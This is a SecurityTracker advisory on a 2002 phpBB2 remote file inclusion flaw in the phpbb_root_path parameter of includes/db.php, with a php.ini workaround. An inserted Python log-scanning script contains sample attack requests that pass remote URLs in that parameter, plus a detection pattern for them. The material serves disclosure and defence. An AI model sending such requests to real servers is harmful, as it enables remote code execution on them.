SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   phpBB
Vendors:   phpBB Group
phpBB Relative Include Path Bug Lets Remote Users Execute Arbitrary PHP on the Server
SecurityTracker Alert ID:  1003843
SecurityTracker URL:  http://securitytracker.com/id/1003843
CVE Reference:   GENERIC-MAP-NOMATCH
Updated:  May 24 2002
Original Entry Date:  Mar 18 2002
Impact:   Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 2.0 RC1, RC2, and RC3
Description:   A vulnerability was reported in the phpBB forum software. A remote user can cause the server to execute arbitrary PHP code.

It is reported that a remote user can specify a relative include path to include a PHP file located on a remote server. This allows the remote user to cause the server to execute arbitrary code hosted on the remote server.

The vulnerability is apparently in the "phpBB2 root path":

'/phpBB2/includes/db.php?phpbb_root_path='

A demonstration exploit is provided in the Source Message.
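The request pattern the advisory describes (a remote URL supplied in the phpbb_root_path query parameter of includes/db.php) is easy to spot in web-server access logs. The following detection script is an added example, not part of the original advisory or of phpBB; the log lines and client/remote addresses in it are constructed, and it also catches percent-encoded and double-encoded URL schemes, which the advisory does not discuss.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Common Log Format); not taken from the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Mar/2002:10:01:02 +0000] "GET /phpBB2/index.php HTTP/1.0" 200 5123
10.0.0.7 - - [18/Mar/2002:10:01:09 +0000] "GET /phpBB2/includes/db.php?phpbb_root_path=http://203.0.113.9/ HTTP/1.0" 200 311
10.0.0.8 - - [18/Mar/2002:10:02:15 +0000] "GET /phpBB2/includes/db.php?phpbb_root_path=ftp%3A%2F%2F198.51.100.4%2F HTTP/1.0" 200 311
10.0.0.9 - - [18/Mar/2002:10:03:44 +0000] "GET /phpBB2/viewtopic.php?t=42 HTTP/1.0" 200 8821
"""

# Pull the request target out of the quoted request field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A legitimate root path is a local directory and never carries a URL scheme;
# any scheme (http://, ftp://, ...) means PHP would fetch the include remotely.
REMOTE_SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.IGNORECASE)


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding, stopping once the value no longer changes."""
    for _ in range(max_rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value


def is_remote_include(value: str) -> bool:
    """True if the parameter value, once decoded, names a remote URL."""
    return bool(REMOTE_SCHEME_RE.match(decode_fully(value)))


def find_rfi_attempts(log_text: str, param: str = "phpbb_root_path"):
    """Return (client_ip, decoded_value) for each request passing a remote URL in `param`."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qs already removes one layer of percent-encoding.
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            if is_remote_include(value):
                hits.append((line.split(" ", 1)[0], decode_fully(value)))
    return hits
```

Hits from this script are worth correlating with outbound connections from the web server, since the vulnerable include only succeeds when PHP can fetch the remote file (the allow_url_fopen setting in the workaround below controls exactly that).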

Impact:   A remote user can execute arbitrary PHP code on the phpBB server.
Solution:   No solution was available at the time of this entry.

The author of the report has provided the following workaround:

In php.ini, disallow remote URLs:

allow_url_fopen = Off

Vendor URL:  phpbb.sourceforge.net/phpBB2/
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Fix is Available) Re: phpBB Relative Include Path Bug Lets Remote Users Execute Arbitrary PHP on the Server
A fix is available.



 Source Message Contents

Subject:  phpBB2 is vulnerable to remote command execution


18th Mar 2002

COMMAND

phpBB2 is vulnerable to remote command execution

SYSTEMS AFFECTED

version 2.0

PROBLEM

pokley and nullbyte [http://www.inetd-secure.net] found the following:

A bug can be found in the "phpBB2 root path", which allows a remote attacker to execute any command remotely. The vulnerability starts with '/phpBB2/includes/db.php?phpbb_root_path=' but some backdoor server is needed to launch the attack. I did not look further into this bug. It was tested on most *nix systems running phpBB2 version 2.0. Probably all versions.

 Exploit
 =======




SOLUTION

 Workaround
 ==========

In php.ini, disallow remote URLs:

allow_url_fopen = Off


Copyright 2019, SecurityGlobal.net LLC